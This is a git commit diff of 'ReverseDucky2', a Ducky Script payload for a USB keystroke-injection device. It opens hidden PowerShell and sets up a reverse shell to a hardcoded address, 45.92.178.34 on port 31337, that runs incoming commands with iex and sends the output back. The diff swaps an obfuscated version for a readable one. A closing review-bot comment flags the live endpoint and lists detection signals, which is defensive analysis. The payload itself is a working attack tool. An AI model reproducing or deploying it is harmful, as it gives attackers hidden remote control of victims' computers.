Aleksandr Sobolev 2024-08-22 10:34:13 +03:00
parent fc7e0f72ff
commit 5c745acc66


@ -1,25 +1,34 @@
REM ReverseDucky2
REM Version 1.1
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13
REM Reverse shell executed in the background
REM Fill in Attacker-IP and Port in Line 19
REM DON'T FORGET TO START LISTENER
DELAY 1500 DELAY 1500
GUI r GUI r
DELAY 500 DELAY 500
STRING powershell -NoP -NonI -W hidden STRING powershell -NoP -NonI -W Hidden -Command
DELAY 250 DELAY 250
ENTER ENTER
DELAY 200 DELAY 200
STRING $c=NewObject System.Net.Sockets.TCPClient("45.92.178.34", 31337);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$
STRING $client = New-Object System.Net.Sockets.TCPClient("45.92.178.34", 31337);
DELAY 100 DELAY 100
STRING s.Read($b,0,$b.Length))-ne 0){;$d=(NewObject -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$z=(ieX $d 2>&1|oU STRING $stream = $client.GetStream();
DELAY 100 DELAY 100
STRING t-String);$x=$z+"RD "+(pwd)+"#";$y=([text.encoding]::ASCII).GetBytes($x);$s.Write($y,0,$y.Length);$s.Flush()};$c.Close() STRING [byte[]]$buffer = 0..65535|%{0};
DELAY 100
STRING while(($bytesRead = $stream.Read($buffer, 0, $buffer.Length)) -ne 0) {
DELAY 100
STRING $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($buffer,0, $bytesRead);
DELAY 100
STRING $sendback = (iex $data 2>&1 | Out-String );
DELAY 100
STRING $sendback2 = $sendback + "PS " + (pwd).Path + "> ";
DELAY 100
STRING $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
DELAY 100
STRING $stream.Write($sendbyte, 0, $sendbyte.Length);
DELAY 100
STRING $stream.Flush()
DELAY 100
STRING };
DELAY 100
STRING $client.Close()
DELAY 100 DELAY 100
ENTER ENTER
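Review bot: The rewritten payload still carries a literal routable endpoint, `TCPClient("45.92.178.34", 31337)`, on the `$client = New-Object ...` line, so the file as committed points at whoever owns that address instead of being an inert sample. The header comment `REM Fill in Attacker-IP and Port in Line 19` also appears stale after the refactor, since the address now sits on a different line than the one it names. I would commit an obvious placeholder, e.g. `TCPClient("<LISTENER-IP>", <PORT>)`, and reword the REM to refer to the `$client` line rather than a line number. For anyone triaging this as a detection sample, the refactor does not change the observable signals: a `powershell -NoP -NonI -W Hidden` process started from the Run dialog, and script-block logging that shows `System.Net.Sockets.TCPClient` together with `iex`.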